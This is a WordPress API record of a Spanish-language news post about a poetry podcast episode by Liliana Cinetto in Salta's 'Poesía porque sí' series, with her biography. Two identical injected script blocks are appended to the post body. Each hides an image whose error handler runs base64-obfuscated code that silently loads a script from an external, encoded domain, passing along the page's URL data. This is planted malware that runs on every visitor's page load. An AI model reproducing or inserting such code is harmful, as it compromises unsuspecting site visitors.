{"id":3016,"date":"2023-08-24T10:53:06","date_gmt":"2023-08-24T13:53:06","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3016"},"modified":"2025-08-14T00:09:56","modified_gmt":"2025-08-14T03:09:56","slug":"el-complejo-explora-salta-estrena-poesia-de-liliana-cinetto","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3016","title":{"rendered":"El Complejo Explora Salta estrena poes\u00eda de Liliana Cinetto"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#69022d\"><em>Como cada semana, este viernes se lanza una nueva pieza sonora del ciclo \u201cPoes\u00eda porque s\u00ed\u201d en las redes sociales del Complejo Museol\u00f3gico Explora Salta.<\/em><\/h3>\n\n\n\n<p>En el marco de Cultura en Democracia, programa que viene llevando a cabo la Secretar\u00eda de Cultura, el Complejo Museol\u00f3gico Explora Salta estrena todas las semanas un nuevo episodio de podcast con poes\u00eda local. Estas piezas de comunicaci\u00f3n cuentan con la participaci\u00f3n de poetas y artistas salte\u00f1os y salte\u00f1as en conmemoraci\u00f3n de los 40 a\u00f1os ininterrumpidos de Democracia. En esta ocasi\u00f3n se publicar\u00e1 la poes\u00eda &nbsp;Liliana Cinetto.<\/p>\n\n\n\n<p>El objetivo del proyecto \u201cPoes\u00eda porque s\u00ed\u201d, busca reflexionar y visibilizar la diversidad de pensamientos e im\u00e1genes que circulan entre la comunidad salte\u00f1a, poniendo en valor las expresiones culturales locales, compartiendo cada viernes poes\u00edas escritas por mujeres y artistas salte\u00f1os.<\/p>\n\n\n\n<p><strong>Sobre la escritora&nbsp;<\/strong><\/p>\n\n\n\n<p><strong>Liliana Cristina Cinetto<\/strong>&nbsp;naci\u00f3 en Buenos Aires y es Profesora de Ense\u00f1anza Primaria, Profesora de Letras, escritora y narradora de historias. Como docente, ha ejercido en escuelas primarias y ha dictado cursos y talleres de capacitaci\u00f3n en Argentina, Brasil, Bolivia, Chile, Colombia, Espa\u00f1a, M\u00e9xico, Portugal y Rep\u00fablica Dominicana.<\/p>\n\n\n\n<p>Como autora, ha publicado m\u00e1s de 100 libros para chicos. Tambi\u00e9n ha publicado cuentos y poes\u00edas en antolog\u00edas de Editorial Norma Kapelusz, Edelvives, Edeb\u00e9, Estrada, Aique, Santillana (Argentina, Chile, Bolivia, Per\u00fa, Colombia), Marenostrum (Chile), Norma (Puerto Rico y EE.UU.), S.M. (Espa\u00f1a y Puerto Rico), Everest (Espa\u00f1a), Cajasur (Espa\u00f1a), McGraw-Hill (Estados Unidos), Tinta Fresca, Puerto de Palos, Grupo Cinco Editores y art\u00edculos te\u00f3ricos en las revistas Mnemosine (Espa\u00f1a), Para la Libertad, Ludo, Ser y expresar docente y en el Bolet\u00edn Cultural de A.E.P.A.<\/p>\n\n\n\n<p>Muchos de sus textos han sido traducidos al franc\u00e9s, ingl\u00e9s, portugu\u00e9s, catal\u00e1n e italiano.<\/p>\n\n\n\n<p>Su obra reconocida en Latinoam\u00e9rica y Espa\u00f1a ha recibido importantes premios como el Alfonso Grosso, de Sevilla por su primer libro de cuentos para adultos, La vida es cuento, adem\u00e1s del premio \u00c1ccesit del Conservatorio literario de Rosario, el primer premio y la segunda y cuarta menci\u00f3n en el Primer Concurso Nacional de la Canci\u00f3n Infantil organizado por Aries F.M., auspiciado por la SADE de Salta y el segundo premio en el Primer concurso de Literatura Infantil de Sigmar por su novela El tesoro del \u00faltimo drag\u00f3n.<\/p>\n\n\n\n<p><strong>Otras obras del Ciclo<\/strong><\/p>\n\n\n\n<p>Justo cuando&nbsp;<\/p>\n\n\n\n<p>C\u00edrculos<\/p>\n\n\n\n<p>\u00bfQu\u00e9?&nbsp;<\/p>\n\n\n\n<p>Que se quede entre nos.<\/p>\n\n\n\n<p>Para que no muera en el asombro.<\/p>\n\n\n\n<p>De ninguna guerra de vuelve.<\/p>\n\n\n\n<p>De los r\u00edos internos.<\/p>\n\n\n\n<p>Hay mujeres.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-complejo-explora-salta-estrena-poesia-de-liliana-cinetto-91412\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Como cada semana, este viernes se lanza una nueva pieza sonora del ciclo \u201cPoes\u00eda porque s\u00ed\u201d en las redes sociales del Complejo Museol\u00f3gico Explora Salta. En el marco de Cultura en Democracia, programa que viene llevando a cabo la Secretar\u00eda de Cultura, el Complejo Museol\u00f3gico Explora Salta estrena todas las semanas un nuevo episodio de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3017,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,11],"tags":[],"class_list":{"0":"post-3016","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3016"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3016"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3016\/revisions"}],"predecessor-version":[{"id":6985,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3016\/revisions\/6985"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3017"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3016"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3016"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3016"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}